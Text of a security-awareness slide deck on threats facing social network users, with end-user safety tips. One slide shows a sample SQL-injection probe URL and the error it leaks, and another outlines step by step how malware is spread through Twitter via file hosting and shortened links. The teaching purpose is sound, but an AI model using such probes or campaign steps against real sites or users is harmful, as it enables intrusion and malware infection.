This document discusses security and privacy issues related to social networks. It begins by defining social networks and providing examples. It then outlines common web vulnerabilities like phishing, spam, XSS attacks, and discusses how these risks are increased in social networks due to features like third-party apps, public profiles, and the amount of personal data shared. The document provides tips for securing accounts including using strong unique passwords, checking privacy settings, and being wary of emails or links asking for private information.

1. SECURITY & 1
PRIVACY
ON SOCIAL
NETWORKS
Omar M Alsuhaibany
CISSP, GCFA, ISO 27001 LA

2. It’s not only about Facebook :)
2

3. Before Social Networks
3
Social
Networks

4. A Social Networks definition
4
 Defines itself  on Wiki:
A social network is a social structure made up of
individuals (or organizations) called "nodes",
which are tied (connected) by one or more
specific types of interdependency, such as
friendship, kinship, common interest, financial
exchange, dislike, or relationships of beliefs,
knowledge or prestige.

5. Examples of Social Networks?
5
 Facebook
 LinkedIn
 Twitter
Even more media:
 RSS Feeds
 Blogs
 Wikis
 Web Chat
 Podcasts
 Mashups
 Photo/Video-sharing
 Virtual Worlds

6. Common Web 2.0
6
Vulnerabilities
 Phishing
 Spam
 Malwares
 Cross Site Scripting
 SQL Injection
 Authentication and Authorization Flaws
 Information Leakage
 Insecure Storage
 Insecure Communications

7. Some Web 2.0 Specific
7
Vulnerabilities
 On top of that list we do have some specific
Web 2.0 vulnerabilities:
 XSS Worms
 Feed Injections
 Mashup and Widget Hacks

8. Well First thing first:
8
Passwords!!!
 Is it new thing? No, however its different.
 Password sloth. Using the same password on
several sites is like trusting the weakest link in a
chain to carry the same weight.
 Use same password as your email when the login
username is your email!!
 According to FB stats. More than 50% use the
same password.
 Avoid using the same password on multiple sites
 Do not synchronize account information with
organization login credentials.

9. Phishing
9

10. Phishing
10
cont’d

11. Phishing
11
cont’d
 Major phishing attempts
 Simple "look at this" message
 Users directed to fbstarter.com, fbaction.net
 Phished credentials used to automatically log in,
send more mail
 Some users report passwords changed
 Phishtank reports Facebook 7th most common
target
 Behind only banks, PayPal eBay
 "Socail Phishing" is far more effective

12. Phishing
12
cont’d
 72% successful in controlled study
 No TLS for login page
 No Anti-phishing measures
 Frequent genuine emails with login links
 Users don't consider social networks'
passwords as valuable
 Web 2.0 sites encourage password sharing…
 Facebook is doing a good job but still!

13. Phishing
13
cont’d

14. Phishing
14
cont’d

15. Spam
15
 Spam is not only for spamming purposes!
Although annoying.
 All new types: followers, friend requests, fake
accounts

16. Spam
16
cont’d
 Fighting the Spam
 Automatically detect spammer profiles:
 analyze link history
 analyze graph structure
 analyze profile
 Aggressivelyrequest CAPTCHAs
 Users feedback
 Classifiers
 Stringblocking
 Hashing
 Machine Learning

17. Cross Site Scripting (XSS)
17
 New to Web 2.0? No
 Is this worse in Web 2.0? Yes
 XSS flaws occur whenever an application takes
user supplied data and sends it to a web browser
without first validating or encoding that content.

18. XSS Worms
18
 New to Web 2.0? Yes
 Self propagating XSS code injected into a web
application which will spread when users visits a
page.
 First XSS worm, 4 years ago spread through
MySpace
 1 million+ infections in 24 hours

19. Feed Injections
19
 New to Web 2.0? Yes
 Feed aggregators have data coming from various
untrusted sources. The data being received can
be malicious and exploit users.
 Remote Zone Risks
 Web browsers or web based readers in this
category
 Attacks such as XSS and CSRF possible

20. Mashup and Widget
20
 New to Web 2.0? Yes
Mashups and Widgets are core components in
Web 2.0 sites. The rich functionality they
provide can be exploited by attackers through
attacks such as XSS.

21. Mashup and Widget
21
cont’d
 Mashups site is the middleman, do you trust
it?
 Multiple inputs, one output
 Mashup communications could leak data
 Mashups require cross domain access.

22. Mashup and Widget
22
cont’d

23. Information Leakage
23
 New to Web 2.0? No
 Is this worse in Web 2.0? Yes
Applications can unintentionally leak
information about their configuration, internal
workings, or violate privacy through a variety
of application problems.

24. Information Leakage
24
cont’d
 A simple lack of error handling leaking information
 http://www.examplesite.com/home.html?day=Mon
dayDrivers(0x80040E14)
 I add a little something onto the URL
 http://www.examplesite.com/home.html?day=Mon
day AND userscolumn=2
 No error handling = information leakage
Microsoft OLE DB Provider for ODBC
Drivers(0x80040E14) [Microsoft][ODBC SQL Server
Driver][SQL Server]Invalid column
name/examplesite/login.asp, line 10

25. Information Leakage
25
cont’d
 What makes this worse in Web 2.0?
 Business logic and validation moved to the
client side
 Web 2.0 apps will do a lot of work on the client
side
 Validation of data, business logic and sensitive
data
 You need to back these up with server side
checks
 Never assume sensitive data will be safe client

26. Authentication and
Authorization Flaws
26
 New to Web 2.0? No
 Is this worse in Web 2.0? Yes
These flaws can lead to the hijacking of user
or accounts, privilege escalation, undermine
authorization and accountability controls, and
cause privacy violations.

27. Authentication and
Authorization Flaws
27
cont’d
 Authentication and Authorization Weaknesses
 Passwords with no max age, reasonable lengths and
complexity
 Lack of brute force protection
 Broken CAPTCHA systems
 Security through obscurity
 Session Management Weaknesses
 Lack of sufficient entropy in session ID’s
 Predictable session ID’s
 Lack of sufficient timeouts and maximum lifetimes for
ID’s
 Using one session ID for the whole session

28. Authentication and
Authorization Flaws
28
cont’d
 What makes this worse in Web 2.0?
 CAPTCHA’s used to provide strong A+A but are
often weak
 More access points in Web 2.0 applications
 The use of single sign on leads to single point of
failure
 Growth in other attacks further undermines A+A

29. Insecure Storage and
Communications
29
 New to Web 2.0? No
 Is this worse in Web 2.0? Yes
These flaws could allow sensitive data to be
stolen if the appropriate strong protections
aren’t in place.

30. Insecure Storage and
Communications
30
cont’d
 Insecure storage of data
 Not encrypting sensitive data
 Hard coding of keys and/or insecurely storing keys
 Using broken protection mechanisms (i.e. DES)
 Failing to rotate and manage encryption keys
 Insecure communications
 Not encrypting sensitive data in transit
 Only using SSL/TLS for the initial logon request
 Failing to protect keys whilst in transit
 Emailing clear text passwords

31. Insecure Storage and
Communications
31
cont’d
 What makes this worse in Web 2.0?
 More data in more places, including client side
storage
 Mixing secure and insecure content on a page
 And now with the Cloud!!!

32. Browsing Habits and Experience
32
have Changed…
 Trigger finger (clicking on everything). Inboxes
contain everything from drink requests to
cause requests, do not get into the click habit
unless you are ready to deal with drive-by
downloads and zero-day attacks.

33. A little on Privacy …
33
 3rd Party Apps on Facebook
 Anyone can create a Facebook app
 Many of the agreement you must accept gives
the company the right to monitor your data and
sell it without informing you.
 Tracker information can be built into any
application.
 Mixing personal with professional; Commonly on
Facebook, where one’s friends included business
associates, family members and friends.
 Engaging in Tweet (or Facebook/LinkedIn/Myspace)
rage. Imagine you are at a party where everyone is
listening, including your boss, spouse and future
employer.

34. Privacy
34
cont’d

35. Privacy
35
cont’d

36. Data = $$$
36
 Steal your money directly
 Sell your data
 Trick your friends and family into supplying
personal data
 Sell your identity
 Use your accounts to spread spam, malware and
more data theft scams
 Sell your organization's data or sensitive
information
 Blackmail individuals and organizations

37. URL Shortners Risks
37
 bit.ly, hex.io, zi.ma …etc
 Where the URL will take you?
 dubious link via email? Hover your mouse or
check the HTML
 A new way for email Phishing scams
 DDOS with iframe
 Easily escaping spam filters
 Even more dangerous! what if the site got
hacked?
 “See before you click” functionality or extensions
 Example: j.mp

38. Malware example: Koobface
38
 The Koobface worm and its associated botnet have gained notoriety in
security circles for its longevity and history of targeting social networking
sites. First surfacing in 2008 within MySpace and Facebook, the worm
resurfaced in early 2009, this time targeting Twitter users.
 By using Phishing techniques, the message directs the recipients to a third-
party website, where they are prompted to download what is purported to be
an update of the Adobe Flash player.
 11/10/2009 - As part of a new Koobface attack, links to Google Reader
URLs controlled by cyber-criminals are being spammed by Koobface onto
social network sites, including Facebook and MySpace. The hundreds of
Google accounts involved host a page with a fake YouTube video. Attempts
to view this supposed video expose Windows users to infection by
Koobface.
 Koobface ultimately attempts, upon successful infection, to gather sensitive
information from the victims such as credit card numbers.

39. Facebook Widget Installing
39
Spyware
 Prompts users to install the infamous "Zango"
adware/spyware.

40. Twitter hacking example:
40
 Select victim group using any one of a number of
Twitter trend tools.
 Select malware based on device or location info.
 Upload malware to dropbox.com and request a
public link for the uploaded file.
 Use a URL shortening service to obfuscate the
URL.
 Send tweet to target referencing information or
post with keywords so that all individuals
“tracking” the keywords will be notified of a new
tweet on the subject they are tracking.

41. Scareware Tweets
41
 Scareware is fake anti-virus – instead of
protecting your computer it infects it
 Scammers create multiple tweets that direct you
to a scareware page. They then try to frighten
you into believing you have a security problem
and need their software to address it
 Other scareware attacks aim to:
 Take control of your computer to send spam
 Hold your computer to ransom
 Result: Malware infection

42. Security analysis difficulties
42
with Web 2.0
 More code and complexity in Web 2.0 apps
 At least two languages to analyze (client and
server)
 User supplied code might never be reviewed
 Dynamic nature increases risk of missing flaws
 Increased amount of input points

43. Basics of Social Networking
43
Security
 Never Post Personal Information Online
 Everything you post is public information
 If you don’t feel comfortable with everyone seeing it, then don’t put it
online
 Configure security settings on all sites
 Most websites you log into have security configurations
 Set the privacy levels in accordance to what you are posting
 Change your Password Regularly
 Use Phrases, not words
 Do not keep a “Master” password
 Never Trust E-mails asking for personal information
 An official organization will never ask you to disclose any private
information in order to correct a error

44. Basics of Social Networking
Security
44
cont’d
 Do not friend anyone you do not know and trust
 Hackers and spammers are more clever then you think. There is a reason many
online scams are called “Social engineering”
 Clean out your friend list regularly
 Watch For Hacked Friend Accounts
 Unusual posts or requests
 Posting “Shock Sites”
 Beware of Third Party Apps
 Many require you to sign a agreement giving them the right to sell your
information
 Malicious code can be written in the program
 Delete unused Apps
 If you are not using them, then why let them potentially mine data about you?
 If you are unsure a app or a post or anything, then Google is your
best friend

45. Basics of Social Networking
Security
45
cont’d
 Caution about posting your location online
 People are watching you where you will be and more importantly where you will
not be
 Check your security settings monthly
 Facebook sets all profiles to public with each site redesign
 Apps may disable your security settings
 Viruses and Malware may disable your security settings
 Consider using Private Browsing
 Private Browsing allows you to view websites without storing your history or
installing cookies
 Private Browsing Shortcuts:
 Firefox – Ctrl + Shift + P
 Internet Explore 8 – Ctrl + Shift + P
 Opera – Ctrl + Shift + N
 Google Chrome – Ctrl+Shift+N
 Don’t stay logged on

46. Basics of Social Networking
Security
46
cont’d
 Set your settings to high privacy and/or enable
security settings on the sites you use.
 Review a given Website’s privacy policy, you
may be surprised on what you are actually
agreeing to.
 Log off when you leave.
 Install and update antivirus software.
 Keep system software AND applications up to
date.
 Make sure the connection you use is secure.

47. ? ? ?
? ? ? ?
? ? ?